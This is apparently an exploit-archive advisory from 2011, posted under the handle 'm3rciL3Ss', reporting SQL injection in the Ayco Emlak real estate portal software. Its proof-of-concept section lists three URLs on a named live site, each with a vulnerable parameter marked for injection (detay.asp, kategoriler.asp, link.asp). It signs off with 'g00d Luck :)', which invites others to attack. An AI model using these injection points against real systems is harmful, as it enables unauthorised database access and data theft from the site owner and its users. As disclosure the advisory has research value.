Ayco Emlak suffers from a remote SQL injection vulnerability.
f8bce656a88e6f072ea08c8693bc9c35408a509bd88b81b3c2a079ff6b47e6c9
# Exploit Title: Ayco Emlak SQL Injection Vulnerability
# Google Dork: n/a
# Date: 18.09.2011
#Author: m3rciL3Ss
# Software Link:http://www.ay-computer.com.tr/sanalmagazashopveemlakportal.asp
#Version:
# Tested on:http://emlak.ay-computer.de/
################################
===[ POC ]===
[»] http://emlak.ay-computer.de/detay.asp?ilanid=8%28%29 [SQL]
[»] http://emlak.ay-computer.de/kategoriler.asp?id=4%28%29 [SQL
[»] http://emlak.ay-computer.de/link.asp?page=referanslarimiz&id=2%28%29 [SQL]
g00d Luck :)
################################
Thanks :TuBiGu and Bgh7
m3rciL3Ss@w.cn